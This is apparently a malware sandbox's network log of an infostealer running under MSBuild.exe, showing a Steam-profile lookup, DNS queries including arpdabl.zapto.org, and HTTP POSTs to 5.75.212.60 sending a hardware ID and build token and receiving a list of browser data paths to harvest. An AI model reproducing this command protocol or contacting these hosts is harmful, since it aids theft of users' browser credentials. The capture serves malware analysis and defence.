                                                                                      Jul 26, 2024 03:18:18.252016068 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.252115011 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.252130032 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.252182961 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.252610922 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.252666950 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.252672911 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.252697945 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.252738953 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.252738953 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.268534899 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.268575907 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.268659115 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.268666029 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.268722057 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.284864902 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.284919977 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.285072088 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.285072088 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.285080910 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.285146952 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.293077946 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.293124914 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.293173075 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.293180943 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.293210983 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.293231964 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.303895950 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.303942919 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.303994894 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.304002047 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.304033041 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.304053068 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.308720112 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.308763027 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.308804035 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.308810949 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.308835983 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.308856964 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.316822052 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.316864967 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.316922903 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.316943884 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:23.574561119 CEST443497575.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:23.583646059 CEST49757443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:23.583655119 CEST443497575.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:24.207108021 CEST443497575.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:24.207189083 CEST443497575.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:24.207417011 CEST49757443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:24.207417011 CEST49757443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:24.208390951 CEST49757443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:24.208410978 CEST443497575.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.013562918 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.013654947 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.013777971 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.014108896 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.014142036 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.674190044 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.674396992 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.674777985 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.674789906 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.676562071 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.676567078 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.676915884 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.676929951 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.677002907 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.677015066 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.677025080 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.677033901 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.677087069 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.677115917 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.677139044 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.677162886 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.677232981 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.677246094 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:26.751691103 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:26.751763105 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:26.751768112 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:26.751821995 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:26.752038956 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:26.752058983 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:26.755583048 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:26.755628109 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:26.755696058 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:26.755912066 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:26.755923986 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:27.420453072 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:27.420563936 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:27.421073914 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:27.421084881 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:27.422837973 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:27.422852039 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.086719036 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.086816072 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.086834908 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.086879015 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.087156057 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.087173939 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.088529110 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.088581085 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.088654995 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.088866949 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.088887930 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.739867926 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.739936113 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.740348101 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.740364075 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.742865086 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.742876053 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:29.412822008 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:29.412895918 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:29.412902117 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:29.412964106 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:29.413263083 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:29.413278103 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:59.256890059 CEST4972480192.168.2.4199.232.210.172
                                                                                      Jul 26, 2024 03:18:59.262610912 CEST8049724199.232.210.172192.168.2.4
                                                                                      Jul 26, 2024 03:18:59.262713909 CEST4972480192.168.2.4199.232.210.172
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 26, 2024 03:17:51.272470951 CEST | 61248 | 53 | 192.168.2.4 | 1.1.1.1
Jul 26, 2024 03:17:51.279875040 CEST | 53 | 61248 | 1.1.1.1 | 192.168.2.4
Jul 26, 2024 03:18:29.423898935 CEST | 59737 | 53 | 192.168.2.4 | 1.1.1.1
Jul 26, 2024 03:18:29.432693005 CEST | 53 | 59737 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 26, 2024 03:17:51.272470951 CEST | 192.168.2.4 | 1.1.1.1 | 0x26b5 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Jul 26, 2024 03:18:29.423898935 CEST | 192.168.2.4 | 1.1.1.1 | 0xa2f8 | Standard query (0) | arpdabl.zapto.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 26, 2024 03:17:51.279875040 CEST | 1.1.1.1 | 192.168.2.4 | 0x26b5 | No error (0) | steamcommunity.com |  | 23.192.247.89 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 03:18:10.095055103 CEST | 1.1.1.1 | 192.168.2.4 | 0x367f | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 26, 2024 03:18:10.095055103 CEST | 1.1.1.1 | 192.168.2.4 | 0x367f | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 03:18:29.432693005 CEST | 1.1.1.1 | 192.168.2.4 | 0xa2f8 | No error (0) | arpdabl.zapto.org |  | 77.91.101.71 | A (IP address) | IN (0x0001) | false
                                                                                      • steamcommunity.com
                                                                                      • 5.75.212.60
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 23.192.247.89 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:17:52 UTC | 119 | OUT | GET /profiles/76561199747278259 HTTP/1.1
                                                                                      Host: steamcommunity.com
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
2024-07-26 01:17:52 UTC | 1870 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                      Cache-Control: no-cache
                                                                                      Date: Fri, 26 Jul 2024 01:17:52 GMT
                                                                                      Content-Length: 34725
                                                                                      Connection: close
                                                                                      Set-Cookie: sessionid=bc423e148286b84182ff57e9; Path=/; Secure; SameSite=None
                                                                                      Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                      2024-07-26 01:17:52 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                      2024-07-26 01:17:52 UTC10062INData Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e
                                                                                      Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
                                                                                      2024-07-26 01:17:52 UTC10149INData Raw: 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f
                                                                                      Data Ascii: kamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:17:53 UTC | 230 | OUT | GET / HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
2024-07-26 01:17:54 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:17:54 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
2024-07-26 01:17:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:17:54 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJ
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 279
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:17:54 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 30 30 36 42 31 45 33 45 46 39 31 38 35 35 38 31 38 33 35 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                      Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="hwid"DA006B1E3EF91855818353-a33c7340-61ca-11ee-8c18-806e6f6e6963------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------
2024-07-26 01:17:55 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:17:55 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:17:55 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 3a1|1|1|0|7d260c1b355efdc632e7bde77b366a9d|1|1|1|0|0|50000|00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:17:56 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:17:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------AFHDAKJKFCFBGCBGDHCBCont
2024-07-26 01:17:56 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:17:56 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:17:56 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                      Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      4 | 192.168.2.4 | 49734 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-07-26 01:17:57 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:17:57 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74
